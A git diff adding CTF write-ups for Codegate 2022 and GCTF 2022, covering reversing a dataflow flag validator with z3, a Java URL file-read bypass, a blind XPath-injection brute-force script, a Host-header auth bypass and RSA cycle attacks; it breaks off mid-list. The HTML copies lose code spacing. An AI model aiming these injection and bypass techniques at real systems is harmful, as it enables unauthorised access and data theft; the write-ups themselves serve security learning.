+log.info("PAYLOAD:\n%s", PAYLOAD)
+
+write_str(0, 0, PAYLOAD)
+log.info("map with payload:")
+pmap()
+log.info("Writing map to file: test.c")
+with open("test.c", "w") as f:
+ f.write("".join(mappa))
+
+rem_map = send_data("$")
+log.info("Remote map:\n%s", rem_map.decode("utf8", errors="ignore"))
+pause()
+do_compile()
+io.interactive()
+
+```
+
+[^1]: The setup actually allowed you to get a terminal on the server. However, since the flag is only readable by root and the challenge binary is setuid, we still need to pwn the binary.
diff --git a/Codegate-2022-quals/rev/vlfv.html b/Codegate-2022-quals/rev/vlfv.html
new file mode 100755
index 0000000..3438ff5
--- /dev/null
+++ b/Codegate-2022-quals/rev/vlfv.html
@@ -0,0 +1,392 @@
+
+
+
+
+
+Very Long Flag Validator | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
After opening the binary in ida and adjusting the maximum size for functions
+to actually get a nicer decompilation, I could identify some C++ functions
+(it took some time to figure out that ida applied wrong lumina data and
+it was actually just vector::push_back and not some Variadic thingy…
+
+
Anyway, after identifying that the main struct initialized in main is
+64 vectors, 64 mutexes, 64 conditional variables and 64 chars and that
+this struct is passed to 64 threads it was pretty clear that there will be
+some inter-trhead communication.
+
+
So after looking at the first thread’s function for some time I realized
+that it locks the lock with a certain index in the struct, then checks if
+there’s something in the vector and if not, it waits using the conditional
+variable with the same index as the lock. Then it pops a value from the vector,
+(by getting the start pointer, dereffing and then popping the value using again
+a C++ function which was a bit tricky to identify).
+
+
This value is then split into the lowest bit as well as the upper bits,
+the upper bits are then compared with certain values (different in each
+function), if the value matches, we store the lowest bit value in a local
+variable (which was initialized to -1 to signify no value). There are always
+three inputs which belong together, they are inputs into a full-adder, so we
+have three inputs and two outputs, the carry was pushed into the vector
+of the next function (in order they were started in / are stored in the binary)
+the upper bits were set to one of the values that function was expecting.
+The xor result of the three inputs was pushed into the vector of the same
+function, again using one of the specified upper bits for this function.
+
+
Parsing of the stuff (pain)
+
+
So this seems to be a dataflow machine, each function is a adding-station,
+and it waits for certain tagged inputs to add them. There are eight functions
+which belong together in the sense that the carry will go to the next function.
+And of these pairs of eight functions there are eight, for a total of 64
+functions. At this point I assumed that it doesn’t matter in which function
+we are and that we just need to care about the tag of the inputs/outputs,
+so I spent a long time to come up with a good way to parse all the station’s
+inputs and outputs. In the end I came up with the following grep command:
+objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2
+which prints all the compares and since grep is smart is prints consecutive
+matches as one block and then separates different blocks by a single line
+of --. So by counting the amount of newlines between two -- I was able
+to determine if it was a block where we check for the two or three input
+tag numbers. Then I just extracted the numbers from the compare instructions
+to get the inputs. Finally if there was an or instruction I assumed that this
+sets the upper bits of the output, there were some complications with this,
+as the compiler is smart and emits an or ah, 1 in cases where the tag
+was 256, so I had to adjust that (and spend about an hour to find a bug
+as one single function used dh instead of ah…).
+
+
After having parsed all of thses things it’s just a matter of putting
+all the initial values and rules into z3 and letting it solve for the
+correct input. This was easily done, as I could just copy the decompiled
+code from main, fix up a few bits (again because of the ah). Then
+I could easily parse that code to get the tags and corresponding values
+(wether that was a constant or one of our input bits).
+
+
Final script
+
+
The final script to parse all the things and solver looks like this:
+
fromz3import*
+
+# objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2 > cmps
+x=open("cmps").read().split("--")
+
+#the tags which symbolize the final value of a station
+tgts=[0xec,0x16d,0x182,0x185,0x194,0x197,0x1a0,0x1a3,0x2ae,0x2cf,0x2d2,0x2e4,0x2f3,0x2ff,0x308,0x30e,0x4cd,0x4d0,0x4e5,0x4e8,0x4f7,0x4fa,0x4fd,0x503,0x57e,0x6a4,0x6b9,0x6bc,0x6cb,0x6ce,0x6d7,0x6dd,0x800,0x84e,0x863,0x866,0x869,0x86c,0x86f,0x875,0xa43,0xa46,0xa5b,0xa6d,0xa7c,0xa7f,0xa88,0xa8e,0xb6c,0xbd5,0xbff,0xc02,0xc11,0xc1d,0xc20,0xc26,0xce3,0xdb8,0xdcd,0xdd0,0xdd3,0xdd6,0xdd9,0xddf]
+# order the threads are started in
+bitorder=[2,28,46,4,32,5,14,40,29,43,25,0,19,35,16,63,59,7,24,22,62,30,36,56,44,42,6,11,58,47,39,34,17,31,26,41,37,3,50,53,13,27,21,49,1,12,51,20,9,52,55,18,10,15,61,8,38,45,23,54,33,60,57,48]
+# the expected outputs, checked in main
+expected=[1,0,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1]
+
+last_outs=[]
+last_inputs=[]
+
+# init solver & values for each tag
+s=Solver()
+tags=[Bool(f"tag_{i}")foriinrange(3554)]
+
+# pushes from main
+xx=open("pushes.c").read().split("\n")
+
+bit=0
+tag=0
+inputs=[Bool(f"in[{i}]")foriinrange(64)]# our input, 64 bits (aka 8 bytes == 16 hex chars)
+consts=[0]*64
+fori,linenumerate(xx):
+ ifl=="":continue
+ ifi&1:
+ idx=int(l.split("[")[1].split("]")[0])
+ s.add(tags[tag]==bit)
+ else:
+ if"|"inl:
+ tag=eval(l.split("|")[1].split(";")[0].strip())
+ assert(tag&1==0)
+ tag>>=1
+ input_idx=int(l.split("[")[1].split("]")[0])
+ bit=inputs[input_idx]
+ else:
+ val=int(l.split("=")[1].strip()[:-1])
+ bit=(val&1)==1
+ tag=val>>1
+ consts[tag]=bit
+
+# the constant values
+#print([1 if x else 0 for x in consts])
+
+# the adding stations...
+idx=-5
+foriinx:
+ if"ret"ini:
+ idx+=1
+ ifidx==64:
+ break
+
+ fl=i.split("\n")[1]
+ if"or"infland"0x"infl:
+ xx=int(fl.split(",")[-1].strip(),0)
+ ifxx>0x10000:
+ xx=xx&0xff
+ if"ah"inflor"dh"infl:# man fuck dh
+xx<<=8
+
+ assert(xx&1==0)
+ last_outs.append(xx>>1)
+
+ if(idxin[7,15,23,31,39,47,55,63]andlen(last_outs)==1)orlen(last_outs)==2:
+ #print(last_inputs, "=>", last_outs)
+xored_tgt=last_outs[-1]
+
+ iflen(last_inputs)==2:
+ s.add(Xor(tags[last_inputs[0]],tags[last_inputs[1]])==tags[xored_tgt])
+ else:
+ # Man fuck z3, why does it allow Xor(a,b,c) with three inputs but doesn't fucking work
+# This could've been solved like 3 hours earlier but because of this fucking
+# z3 thingy they were lost, rip
+s.add(Xor(Xor(tags[last_inputs[0]],tags[last_inputs[1]]),tags[last_inputs[2]])==tags[xored_tgt])
+
+ ifxored_tgtintgts:
+ print("Target found: ",idx,last_inputs,last_outs)
+
+ iflen(last_outs)==2:
+ ovf_tgt=last_outs[0]
+ #print(idx, last_inputs, last_outs)
+iflen(last_inputs)==2:
+ s.add(And(tags[last_inputs[0]],tags[last_inputs[1]])==tags[ovf_tgt])
+ else:
+ a,b,c=tags[last_inputs[0]],tags[last_inputs[1]],tags[last_inputs[2]]
+ s.add(Or(And(a,b),And(a,c),And(b,c))==tags[ovf_tgt])
+
+ ifi.count("\n")>6:
+ last_inputs=[]
+ last_outs=[]
+ forlini.split("\n"):
+ if"cmp"inl:
+ last_inputs.append(int(l.split(",")[-1],0))
+ last_inputs=list(set(last_inputs))
+ #print(idx, last_inputs)
+
+# extract the resulting bits
+results=[tags[tgts[i]]foriinrange(64)]
+
+# add the conditions
+foriinrange(64):
+ s.add(results[i]==(1==expected[bitorder[i]]))
+
+ifs.check()==sat:
+ m=s.model()
+ x=""
+ foriininputs:
+ print(1ifm[i]else0,end="")
+ x+="1"ifm[i]else"0"
+ print()
+ print(hex(int(x[::-1],2))[:1:-1])
+else:
+ print("oof")
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/rev/vlfv.md b/Codegate-2022-quals/rev/vlfv.md
new file mode 100755
index 0000000..03bc713
--- /dev/null
+++ b/Codegate-2022-quals/rev/vlfv.md
@@ -0,0 +1,192 @@
+# Very Long Flag Validator
+
+**Author**: TheBadGod
+
+**Tags:** rev
+
+**Points:** 1000 (2 solves)
+
+**Description:**
+
+> Can you find the flag?
+
+#### Initial reversing
+
+After opening the binary in ida and adjusting the maximum size for functions
+to actually get a nicer decompilation, I could identify some C++ functions
+(it took some time to figure out that ida applied wrong lumina data and
+it was actually just `vector::push_back` and not some Variadic thingy...
+
+Anyway, after identifying that the main struct initialized in main is
+64 vectors, 64 mutexes, 64 conditional variables and 64 chars and that
+this struct is passed to 64 threads it was pretty clear that there will be
+some inter-trhead communication.
+
+So after looking at the first thread's function for some time I realized
+that it locks the lock with a certain index in the struct, then checks if
+there's something in the vector and if not, it waits using the conditional
+variable with the same index as the lock. Then it pops a value from the vector,
+(by getting the start pointer, dereffing and then popping the value using again
+a C++ function which was a bit tricky to identify).
+
+This value is then split into the lowest bit as well as the upper bits,
+the upper bits are then compared with certain values (different in each
+function), if the value matches, we store the lowest bit value in a local
+variable (which was initialized to -1 to signify no value). There are always
+three inputs which belong together, they are inputs into a full-adder, so we
+have three inputs and two outputs, the carry was pushed into the vector
+of the next function (in order they were started in / are stored in the binary)
+the upper bits were set to one of the values that function was expecting.
+The xor result of the three inputs was pushed into the vector of the same
+function, again using one of the specified upper bits for this function.
+
+#### Parsing of the stuff (pain)
+
+So this seems to be a dataflow machine, each function is a adding-station,
+and it waits for certain tagged inputs to add them. There are eight functions
+which belong together in the sense that the carry will go to the next function.
+And of these pairs of eight functions there are eight, for a total of 64
+functions. At this point I assumed that it doesn't matter in which function
+we are and that we just need to care about the tag of the inputs/outputs,
+so I spent a long time to come up with a good way to parse all the station's
+inputs and outputs. In the end I came up with the following grep command:
+`objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2`
+which prints all the compares and since grep is smart is prints consecutive
+matches as one block and then separates different blocks by a single line
+of `--`. So by counting the amount of newlines between two `--` I was able
+to determine if it was a block where we check for the two or three input
+tag numbers. Then I just extracted the numbers from the compare instructions
+to get the inputs. Finally if there was an or instruction I assumed that this
+sets the upper bits of the output, there were some complications with this,
+as the compiler is smart and emits an `or ah, 1` in cases where the tag
+was 256, so I had to adjust that (and spend about an hour to find a bug
+as one single function used dh instead of ah...).
+
+After having parsed all of thses things it's just a matter of putting
+all the initial values and rules into z3 and letting it solve for the
+correct input. This was easily done, as I could just copy the decompiled
+code from main, fix up a few bits (again because of the ah). Then
+I could easily parse that code to get the tags and corresponding values
+(wether that was a constant or one of our input bits).
+
+#### Final script
+
+The final script to parse all the things and solver looks like this:
+```python
+from z3 import *
+
+# objdump --insn-width=100 -d -M intel main | grep -e ret -e cmp -e "[^x]or" -A 2 > cmps
+x = open("cmps").read().split("--")
+
+#the tags which symbolize the final value of a station
+tgts = [0xec,0x16d,0x182,0x185,0x194,0x197,0x1a0,0x1a3,0x2ae,0x2cf,0x2d2,0x2e4,0x2f3,0x2ff,0x308,0x30e,0x4cd,0x4d0,0x4e5,0x4e8,0x4f7,0x4fa,0x4fd,0x503,0x57e,0x6a4,0x6b9,0x6bc,0x6cb,0x6ce,0x6d7,0x6dd,0x800,0x84e,0x863,0x866,0x869,0x86c,0x86f,0x875,0xa43,0xa46,0xa5b,0xa6d,0xa7c,0xa7f,0xa88,0xa8e,0xb6c,0xbd5,0xbff,0xc02,0xc11,0xc1d,0xc20,0xc26,0xce3,0xdb8,0xdcd,0xdd0,0xdd3,0xdd6,0xdd9,0xddf]
+# order the threads are started in
+bitorder = [2,28,46,4,32,5,14,40,29,43,25,0,19,35,16,63,59,7,24,22,62,30,36,56,44,42,6,11,58,47,39,34,17,31,26,41,37,3,50,53,13,27,21,49,1,12,51,20,9,52,55,18,10,15,61,8,38,45,23,54,33,60,57,48]
+# the expected outputs, checked in main
+expected = [1,0,1,1,1,0,1,1,0,1,1,0,1,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,1,1]
+
+last_outs = []
+last_inputs = []
+
+# init solver & values for each tag
+s = Solver()
+tags = [Bool(f"tag_{i}") for i in range(3554)]
+
+# pushes from main
+xx = open("pushes.c").read().split("\n")
+
+bit = 0
+tag = 0
+inputs = [Bool(f"in[{i}]") for i in range(64)] # our input, 64 bits (aka 8 bytes == 16 hex chars)
+consts = [0]*64
+for i,l in enumerate(xx):
+ if l == "": continue
+ if i & 1:
+ idx = int(l.split("[")[1].split("]")[0])
+ s.add(tags[tag] == bit)
+ else:
+ if "|" in l:
+ tag = eval(l.split("|")[1].split(";")[0].strip())
+ assert(tag & 1 == 0)
+ tag >>= 1
+ input_idx = int(l.split("[")[1].split("]")[0])
+ bit = inputs[input_idx]
+ else:
+ val = int(l.split("=")[1].strip()[:-1])
+ bit = (val & 1) == 1
+ tag = val >> 1
+ consts[tag] = bit
+
+# the constant values
+#print([1 if x else 0 for x in consts])
+
+# the adding stations...
+idx = -5
+for i in x:
+ if "ret" in i:
+ idx += 1
+ if idx == 64:
+ break
+
+ fl = i.split("\n")[1]
+ if "or" in fl and "0x" in fl:
+ xx = int(fl.split(",")[-1].strip(),0)
+ if xx > 0x10000:
+ xx = xx & 0xff
+ if "ah" in fl or "dh" in fl:# man fuck dh
+ xx<<=8
+
+ assert(xx&1 == 0)
+ last_outs.append(xx>>1)
+
+ if (idx in [7, 15, 23, 31, 39, 47, 55, 63] and len(last_outs) == 1) or len(last_outs) == 2:
+ #print(last_inputs, "=>", last_outs)
+ xored_tgt = last_outs[-1]
+
+ if len(last_inputs) == 2:
+ s.add(Xor(tags[last_inputs[0]], tags[last_inputs[1]]) == tags[xored_tgt])
+ else:
+ # Man fuck z3, why does it allow Xor(a,b,c) with three inputs but doesn't fucking work
+ # This could've been solved like 3 hours earlier but because of this fucking
+ # z3 thingy they were lost, rip
+ s.add(Xor(Xor(tags[last_inputs[0]], tags[last_inputs[1]]), tags[last_inputs[2]]) == tags[xored_tgt])
+
+ if xored_tgt in tgts:
+ print("Target found: ", idx, last_inputs, last_outs)
+
+ if len(last_outs) == 2:
+ ovf_tgt = last_outs[0]
+ #print(idx, last_inputs, last_outs)
+ if len(last_inputs) == 2:
+ s.add(And(tags[last_inputs[0]], tags[last_inputs[1]]) == tags[ovf_tgt])
+ else:
+ a, b, c = tags[last_inputs[0]], tags[last_inputs[1]], tags[last_inputs[2]]
+ s.add(Or(And(a,b), And(a,c), And(b,c)) == tags[ovf_tgt])
+
+ if i.count("\n") > 6:
+ last_inputs = []
+ last_outs = []
+ for l in i.split("\n"):
+ if "cmp" in l:
+ last_inputs.append(int(l.split(",")[-1],0))
+ last_inputs = list(set(last_inputs))
+ #print(idx, last_inputs)
+
+# extract the resulting bits
+results = [tags[tgts[i]] for i in range(64)]
+
+# add the conditions
+for i in range(64):
+ s.add(results[i] == (1==expected[bitorder[i]]))
+
+if s.check() == sat:
+ m = s.model()
+ x = ""
+ for i in inputs:
+ print(1 if m[i] else 0,end="")
+ x += "1" if m[i] else "0"
+ print()
+ print(hex(int(x[::-1],2))[:1:-1])
+else:
+ print("oof")
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/web/babyfirst.html b/Codegate-2022-quals/web/babyfirst.html
new file mode 100755
index 0000000..98a5a50
--- /dev/null
+++ b/Codegate-2022-quals/web/babyfirst.html
@@ -0,0 +1,272 @@
+
+
+
+
+
+babyFirst | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
The memo application babyFirst allows to write, list and read memos that are created. The complete application logic is in the MemoServlet.class. After decompilation we see the request routing and user/session handling. The only function that is standing out to be exploitable is lookupImg() that gets called when viewing a memo.
A java.net.URL class will be initialized for a given URL in square brackets. Java without custom classes supports several protocols out-of-the-box like http, https as well as file (for local file reads). As the given URL is downcased we can’t use FILE:///flag to read as file protocol is blacklisted. Looking into the java.net.URL source code we find following special case while parsing the URI:
myblog is a simple blog that allows registering a user as well as reading and writing blog posts that have a title and content. The complete application logic is in blogServlet.class. After decompilation we see the request routing and user/session handling. The only function that is standing out to be exploitable is doReadArticle() that gets called when viewing a blog post.
As idx parameter is unfiltered and this parameter goes straight into an XPath evaluation we can inject into XPath. Given the flag being placed in catalina.properties of tomcat means that the flag will be available as a system property called flag. Lucky enough XPath allows to access a system property using fn:system-property() as documented in the XSL function spec.
+
+
We can use the XPath injection to have an oracle (true/false) using an injected XPath. After creating a blog post containing the word MARKER in title and content we use following script to brute the flag content using the true/false oracle of the injection 1' and starts-with(system-property('flag'),'FLAGHERE') or ':
+
+
#!/usr/bin/python
+import requests, string
+headers = {"Cookie":"JSESSIONID=42442D352EBC41CE4FE07B8C0B72820C"}
+chars = "abcdef0123456789}{"
+
+url = 'http://3.39.79.180/blog/read?idx=1%27%20and%20starts-with(system-property(%27flag%27),%27{0}%27)%20or%20%27'
+p = 'codegate2022{'
+while True:
+ print p
+ for x in chars:
+ r = requests.get(url.format(p+x), headers=headers, allow_redirects=False)
+ if "MARKER" in r.text:
+ p += x
+ break
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/web/myblog.md b/Codegate-2022-quals/web/myblog.md
new file mode 100755
index 0000000..5f0e232
--- /dev/null
+++ b/Codegate-2022-quals/web/myblog.md
@@ -0,0 +1,57 @@
+# Myblog
+
+**Author**: jkr
+
+**Tags:** web
+
+**Points:** 884 (19 solves)
+
+**Description:**
+
+> I made a blog. Please check the security.
+
+myblog is a simple blog that allows registering a user as well as reading and writing blog posts that have a title and content. The complete application logic is in `blogServlet.class`. After decompilation we see the request routing and user/session handling. The only function that is standing out to be exploitable is `doReadArticle()` that gets called when viewing a blog post.
+
+```java=
+ private String[] doReadArticle(HttpServletRequest req) {
+ String id = (String)req.getSession().getAttribute("id");
+ String idx = req.getParameter("idx");
+ if ("null".equals(id) || idx == null)
+ return null;
+ File userArticle = new File(this.tmpDir + "/article/", id + ".xml");
+ try {
+ InputSource is = new InputSource(new FileInputStream(userArticle));
+ Document document = DocumentBuilderFactory.newInstance().newDocumentBuilder().parse(is);
+ XPath xpath = XPathFactory.newInstance().newXPath();
+ String title = (String)xpath.evaluate("//article[@idx='" + idx + "']/title/text()", document, XPathConstants.STRING);
+ String content = (String)xpath.evaluate("//article[@idx='" + idx + "']/content/text()", document, XPathConstants.STRING);
+ title = decBase64(title.trim());
+ content = decBase64(content.trim());
+ return new String[] { title, content };
+ } catch (Exception e) {
+ System.out.println(e.getMessage());
+ return null;
+ }
+ }
+```
+
+As `idx` parameter is unfiltered and this parameter goes straight into an XPath evaluation we can inject into XPath. Given the flag being placed in `catalina.properties` of tomcat means that the flag will be available as a system property called `flag`. Lucky enough XPath allows to access a system property using `fn:system-property()` as documented in the [XSL function spec](https://www.w3schools.com/xml/func_systemproperty.asp).
+
+We can use the XPath injection to have an oracle (true/false) using an injected XPath. After creating a blog post containing the word `MARKER` in title and content we use following script to brute the flag content using the true/false oracle of the injection `1' and starts-with(system-property('flag'),'FLAGHERE') or '`:
+
+```python=
+#!/usr/bin/python
+import requests, string
+headers = {"Cookie":"JSESSIONID=42442D352EBC41CE4FE07B8C0B72820C"}
+chars = "abcdef0123456789}{"
+
+url = 'http://3.39.79.180/blog/read?idx=1%27%20and%20starts-with(system-property(%27flag%27),%27{0}%27)%20or%20%27'
+p = 'codegate2022{'
+while True:
+ print p
+ for x in chars:
+ r = requests.get(url.format(p+x), headers=headers, allow_redirects=False)
+ if "MARKER" in r.text:
+ p += x
+ break
+```
\ No newline at end of file
diff --git a/Codegate-2022-quals/web/superbee.html b/Codegate-2022-quals/web/superbee.html
new file mode 100755
index 0000000..3838653
--- /dev/null
+++ b/Codegate-2022-quals/web/superbee.html
@@ -0,0 +1,232 @@
+
+
+
+
+
+superbee | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
We have an API with the following relevant endpoints:
+1) /main/index gives us the flag provided that we have the session cookie set to MD5("admin" + auth_key).
+2) /admin/authkey gives us AES-CBC-ENCRYPT(ptxt=auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key)) if the server’s domain is localhost.
In order to call endpoint 1 and get the flag, we need to get the auth_key. We can call endpoint 2 by simply manually setting the Host header to localhost. From there we need to compute
+AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key))
+Meaning we need to find out the auth_crypt_key. Since auth_crypt_key is read from the config but not actually stored there, it defaults to "". So by setting the session cookie to
+MD5("admin" + AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(""), key=PADDED("")))
+we can get the flag from endpoint 1.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Codegate-2022-quals/web/superbee.md b/Codegate-2022-quals/web/superbee.md
new file mode 100755
index 0000000..759fd99
--- /dev/null
+++ b/Codegate-2022-quals/web/superbee.md
@@ -0,0 +1,35 @@
+# superbee
+
+**Author**: Andris
+
+**Tags:** web
+
+**Points:** 100 (89 solves)
+
+We have an API with the following relevant endpoints:
+1) `/main/index` gives us the flag provided that we have the session cookie set to `MD5("admin" + auth_key)`.
+2) `/admin/authkey` gives us `AES-CBC-ENCRYPT(ptxt=auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key))` if the server's domain is `localhost`.
+
+We are also given this config
+```
+app_name = superbee
+auth_key = [----------REDEACTED------------]
+id = admin
+password = [----------REDEACTED------------]
+flag = [----------REDEACTED------------]
+```
+which is loaded as follows.
+```
+app_name, _ = web.AppConfig.String("app_name")
+auth_key, _ = web.AppConfig.String("auth_key")
+auth_crypt_key, _ = web.AppConfig.String("auth_crypt_key")
+admin_id, _ = web.AppConfig.String("id")
+admin_pw, _ = web.AppConfig.String("password")
+flag, _ = web.AppConfig.String("flag")
+```
+
+In order to call endpoint 1 and get the flag, we need to get the auth_key. We can call endpoint 2 by simply manually setting the `Host` header to `localhost`. From there we need to compute
+`AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(auth_crypt_key), key=PADDED(auth_crypt_key))`
+Meaning we need to find out the `auth_crypt_key`. Since `auth_crypt_key` is read from the config but not actually stored there, it defaults to `""`. So by setting the session cookie to
+`MD5("admin" + AES-CBC-DECRYPT(ctxt=encrypted_auth_key, iv=PADDED(""), key=PADDED("")))`
+we can get the flag from endpoint 1.
\ No newline at end of file
diff --git a/GCTF-2022/crypto/cycling.html b/GCTF-2022/crypto/cycling.html
new file mode 100755
index 0000000..c6ecfb3
--- /dev/null
+++ b/GCTF-2022/crypto/cycling.html
@@ -0,0 +1,474 @@
+
+
+
+
+
+Cycling | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
It is well known that any RSA encryption can be undone by just encrypting the ciphertext over and over again.
+If the RSA modulus has been chosen badly then the number of encryptions necessary to undo an encryption is small.
+However, if the modulus is well chosen then a cycle attack can take much longer. This property can be used for a timed release of a message.
+We have confirmed that it takes a whopping 2^1025-3 encryptions to decrypt the flag.
+Pack out your quantum computer and perform 2^1025-3 encryptions to solve this challenge. Good luck doing this in 48h.
+
+
+
Exploring the challenge
+
+
Let’s have a brief look at the source code we’re provided with:
In short, we’re faced with an RSA encryption of the flag, and one additional “fact” that’s supposed to help us in some way.
+The fact is that when we repeat the encrypting exponentiation $R = 2^{1025} - 3$ times, we achieve the same as decrypting the ciphertext.
+Working through the math, this tells us that $x^{e^{R}} \equiv x$ holds, at the very least when $x$ represents the flag.
+
+
A well-known fact when dealing with RSA, and modular exponentiation in general, is that the order of the multiplicative group mod $n$ is equal to the number of integers $< n$ that are coprime to $n$.
+This quantity is known as Euler’s totient $\varphi(n)$.
+
+
Furthermore, from Euler’s theorem (or Lagrange’s theorem if we frame it in a group-theoretic way), we know that any number $x$ taken to the $\varphi(n)$th power (mod $n$), results in the identity $1$.
+This property is in fact vital for the correctness of RSA, as we rely on the fact that $x^{\varphi(n)} \equiv 1 \pmod n$ when we say that $x^{ed} \equiv \left(x^{\varphi(n)}\right)^k x \equiv x$.
+
+
From all this known theory underlying the RSA cryptosystem, we can now finally make a first deduction: $e^{R + 1} \equiv 1 \pmod{\varphi(n)}$.
+
+
Background: Carmichael’s $\lambda$
+
+
Actually, that previous statement is what you would say with a basic understanding of the principles underlying RSA, but it’s in fact not entirely correct.
+It could very well be the case that $x^\ell \equiv 1 \pmod n$ for $\ell < \varphi(n)$.
+Moreover, this will for the case for every $x$ when $n = pq$ is an RSA modulus.
+One thing that Lagrange’s theorem will still give us, even when $\ell \ne \varphi(n)$, is that $\ell \mid \varphi(n)$.1
+
+
The smallest exponent such that $x^\ell \equiv 1 \pmod n$ for all $x$ is known as the Carmichael function $\lambda(n)$.
+We know that $\lambda(n) \mid \varphi(n)$, but we can even write down a nicer formula:2
Returning to our wrong statement from before, we now know that $e^{R + 1} \equiv 1 \pmod \ell$ where $\ell \mid \lambda(n)$, and furthermore, since $e$ doesn’t look too suspicious, nor can a readable flag be influenced all that much, we can in fact hope that $e^{R + 1} \equiv 1 \pmod{\lambda(n)}$.
+
+
Factors of factors of factors; and some subtractions
+
+
Now that we understand the nuances of the formula $x^\ell \equiv 1$ a bit better, we can think further towards solving this challenge.
+Remember what we wrote down earlier?
+
+\[e^{R + 1} \equiv 1 \pmod{\lambda(n)}\]
+
+
This tells us something more, since we have exactly the form of statement that lead us to introducing $\lambda(n)$ in the first place.
+We could now say that $R + 1 \mid \lambda(\lambda(n))$, which gives us a somewhat nice relation between the value $R$ we’d been given, and our RSA modulus $n$.
+
+
Let’s not worry about the possibility that $R + 1$ is only a divisor, and instead assume that it holds with equality $R + 1 = \lambda(\lambda(n))$.
+Then we can try to write down what we expect $R + 1$ to be:3
We now would like to relate these values $s_i - 1$ to $R$ somehow.
+By the above, it should be clear that any $s_i - 1 \mid R + 1$, so when we list all divisors of $R + 1$ in turn, and add $1$ to them, we should end up with a set of candidates $\mathcal{C}$, such that $\{s_i\}_i \subseteq \mathcal{C}$.
+The value $R + 1$ itself is not particularly easy to factor in a short amount of time, but luckily it’s not an esoteric, unknown value, but a nicely structured one.
+And as it often happens to nicely structured values, they show up on factordb.
+
+
Who cares if it’s not the private key? It works
+
+
With the set $\mathcal{C}$, what could we do?
+One option to consider is applying the same trick again, but using $\mathcal{C}$ rather than the factorization of $R + 1$, to recover $p$ and $q$.
+Annoyingly, $\mathcal{C}$ is a rather large set, and enumerating all subsets of it takes exponential time, so we’ll have to throw that idea out.
+
+
Instead, let’s look back at our initial, more naive, understanding of the RSA cryptosystem, where we used $\varphi(n)$ rather than $\lambda(n)$ to compute the decryption exponent $d = e^{-1} \pmod{\varphi(n)}$.
+Even though we didn’t have the smallest modulus possible, we still had full correctness, since — as we know by now — $\lambda(n) \mid \varphi(n)$.
+We can take that to the extreme: we know/assume that all factors of $\lambda(n)$ are among our values $s_i$, so if we simply take $\Xi = \prod_i s_i$, it should hold that $\lambda(n) \mid \Xi$, and as such, we could use $\Xi$ as a “replacement” for $\lambda(n)$ or $\varphi(n)$ when it comes to computing a decryption exponent.
+
+
With this, we have enough ideas and information to finally solve this challenge4.
+
+
+
CTF{Recycling_Is_Great}
+
+
+
All your factorbase are belong to us
+
+
The official intended solution relies on similar observations, but instead of finding some number $k\lambda(n)$, it uses those potential factors of $\lambda(n)$ to directly factor the modulus $n$.5
+To understand how this factorization works, we look back at a well-known, simple special-purpose factoring algorithm: Pollard’s p - 1 algorithm.
+
+
Pollard’s algorithm allows finding a factor $p$ (say for $n = pq$) under the assumption that $p - 1$ is $B$-powersmooth.
+That is, all prime power divisors $s^r \mid p - 1$ are bounded by $s^r < B$.
+This property enables us to find some product $M$ of prime powers less than $B$, such that $p - 1 \mid M$ but $q - 1 \nmid M$.
+In turn, looking at Fermat’s little theorem, we can see that for all $a$, it holds that $a^M \equiv 1 \pmod p$, but it will often be the case that $a^M \not\equiv 1 \pmod q$, and so looking for $\gcd(a^M - 1, n)$ should allow us to recover $p$.
+Traditionally, Pollard’s method computes $a^M \pmod n$ by repeatedly taking $s$th powers of an accumulator and testing whether the $\gcd$ results in a factorization.
+The advantage of this is twofold: one doesn’t need to fully compute $M$ in its entirety6 and as long as the largest factor of $p - 1$ differs from the largest factor of $q - 1$,7 the method will still work, rather than yielding $n$ as the $\gcd$.
+
+
To abstract the bound $B$ away, we simply notice that all it gives us is some superset $\mathcal{C}$ of prime (power) factors of $p - 1$.
+This is exactly what we already found by enumerating primes $s_i$ such that $s_i - 1 \mid R + 1$!
+If we call such a set $\mathcal{C}$ a factor base, and slightly generalize Pollard’s algorithm, we can apply it to our situation as well.
+And this is exactly the approach we see in the official solution script: we take some base $a$ (there called $m$), repeatedly exponentiate it by potential prime factors, and check if $\gcd(a’ - 1, n) \notin {1, n}$.
+
+
Once a factorization of $n$ is found, it is of course only a matter of performing regular RSA decryption to obtain the flag.
+
+
Does this always work?
+
+
Until now, we’ve made several assumptions that turned out to be correct, in order to solve this challenge.
+Even the official solution turns out to rely on those assumptions,8 so we’d like to have a look at how much trouble we’d be in when the assumptions would be invalidated.
+To restate our assumptions more explicitly:
+
+
+
$R + 1 = \lambda(\lambda(n))$
+
+
